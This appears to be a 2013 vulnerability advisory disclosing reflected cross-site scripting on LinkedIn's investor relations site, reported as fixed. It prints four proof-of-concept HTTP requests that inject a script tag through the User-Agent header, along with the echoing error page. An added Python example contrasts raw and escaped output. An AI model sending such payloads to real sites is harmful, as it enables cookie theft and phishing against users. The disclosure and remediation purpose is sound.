LinkedIn Investors Cross Site Scripting

Posted Mar 25, 2013
Authored by Eduardo Garcia Melia

The LinkedIn Investors site suffered from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 20cf335eff36b02cd7cdf733bd516815daeadfdbe43552c66b7dc93b741b649a

=============================================
INTERNET SECURITY AUDITORS ALERT 2013-006
- Original release date: 4th March 2013
- Last revised: 25th March 2013
- Discovered by: Eduardo Garcia Melia
- Severity: 4.3/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Multiple Reflected XSS vulnerabilities in LinkedIn Investors.

II. BACKGROUND
-------------------------
LinkedIn is a social networking service and website
(http://www.linkedin.com/) that operates the world's largest
professional network on the Internet, with more than 187 million
members in over 200 countries and territories.

More Information: http://press.linkedin.com/about

III. DESCRIPTION
-------------------------
LinkedIn Investors is affected by multiple reflected Cross-Site
Scripting vulnerabilities. An attacker can inject HTML or script code
that runs in the context of the victim's browser, and so can perform
XSS attacks and steal the cookies of a targeted user. The affected
resource is http://investors.linkedin.com.

IV. PROOF OF CONCEPT
-------------------------
The XSS vulnerability is in the User-Agent header:
===============
First XSS
===============
GET /releasedetail.cfm?ReleaseID=738977' HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: <script>alert("XSS")</script>
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2

===============
Second XSS
===============
GET /eventdetail.cfm?eventid=124442'-- HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: <script>alert("XSS")</script>
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2

===============
Third XSS
===============
GET /stocklookup.cfm?historic_Month=2&historic_Day=4&historic_Year=2013'-- HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: <script>alert("XSS")</script>
Referer: http://investors.linkedin.com/stocklookup.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2

===============
Fourth XSS
===============
GET /calculator.cfm?PostBack=1&initialAmnt=100&calc_method=shrs&historic_Month=5&historic_Day=19&historic_Year=2011'--&Submit=Calculate HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: <script>alert("XSS")</script>
Referer: http://investors.linkedin.com/calculator.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2

RESPONSE in all cases:

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 04 Mar 2013 11:34:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<h2>Error occurred processing request</h2>

<b>Error Diagnostic</b><p>
<cfoutput>
Element RESULT.TITLE is undefined in RELEASEDETAIL. <br>The error
occurred on line 175.

Date/Time: Mon Mar 04 06:34:48 EST 2013<br>
Browser: <script>alert("XSS")</script><br>
Remote Address: 192.168.149.88<br>
<!--- removed query string from error page - info sec viewed it as
XSS - tws - 05/18/2010 --->
</cfoutput>
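
The response above echoes the User-Agent header into the error page without encoding, while its own comment shows that the query string had already been removed from the same page for the same reason. The following added example (not code from the advisory or from the affected site, written in Python rather than the site's ColdFusion, with hypothetical function names and sample data constructed from the proof of concept) models that error page with raw output beside output encoding applied to every request-derived field, plus a regression check that lists fields reflected unencoded.

```python
import html

# Constructed sample modelled on the advisory's request and response.
SAMPLE_REQUEST = {
    "error": "Element RESULT.TITLE is undefined in RELEASEDETAIL.",
    "user_agent": '<script>alert("XSS")</script>',
    "remote_addr": "192.168.149.88",
}

# Layout follows the diagnostic page shown in the advisory's response.
TEMPLATE = (
    "<h2>Error occurred processing request</h2>\n"
    "<b>Error Diagnostic</b><p>\n"
    "{error}<br>\n"
    "Browser: {user_agent}<br>\n"
    "Remote Address: {remote_addr}<br>\n"
)

MARKUP_CHARS = "<>\"'&"


def render_error_page_vulnerable(req):
    """Behaviour described in the advisory: request values are pasted in raw."""
    return TEMPLATE.format(**req)


def render_error_page_hardened(req):
    """Encode every request-derived value at the point of output,
    instead of dropping risky fields one at a time."""
    safe = {name: html.escape(str(value), quote=True) for name, value in req.items()}
    return TEMPLATE.format(**safe)


def unencoded_fields(body, req):
    """Regression check: names of fields whose value contains markup
    characters and appears byte-for-byte in the rendered body."""
    return [
        name
        for name, value in req.items()
        if any(c in str(value) for c in MARKUP_CHARS) and str(value) in body
    ]


if __name__ == "__main__":
    for render in (render_error_page_vulnerable, render_error_page_hardened):
        page = render(SAMPLE_REQUEST)
        print(render.__name__, "->", unencoded_fields(page, SAMPLE_REQUEST))
```
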

V. BUSINESS IMPACT
------------------------
This flaw can be used by a malicious user to send phishing to
LinkedIn customers, abusing the users' trust in the LinkedIn portal to
trick them. The user can be forwarded to a LinkedIn clone site that
steals credentials, to a malicious site hosting malware, and more.

VI. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the LinkedIn Investors site:
http://investors.linkedin.com

VII. SOLUTION
-------------------------
Corrected by vendor.

VIII. REFERENCES
-------------------------
http://investors.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)

IX. CREDITS
-------------------------
These vulnerabilities have been discovered by
Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March 04, 2013: Initial release
March 10, 2013: Second release

XI. DISCLOSURE TIMELINE
-------------------------
March 04, 2013: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 10, 2013: Sent to Sec Team.
March 25, 2013: Request for update. Response stating that
it was already corrected. Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain-based leader in web application
testing, network security, penetration testing, security compliance
implementation and assessing. Our clients include some of the largest
companies in areas such as finance, telecommunications, insurance,
ITC, etc. We are a vendor-independent provider with deep expertise
since 2001. Our efforts in R&D include vulnerability research, open
security project collaboration and whitepapers, presentations and
security events participation and promotion. For further information
regarding our security services, contact us.

XIV. FOLLOW US
-------------------------
You can follow Internet Security Auditors, news and security
advisories at:
https://www.facebook.com/ISecAuditors
https://twitter.com/ISecAuditors
http://www.linkedin.com/company/internet-security-auditors
http://www.youtube.com/user/ISecAuditors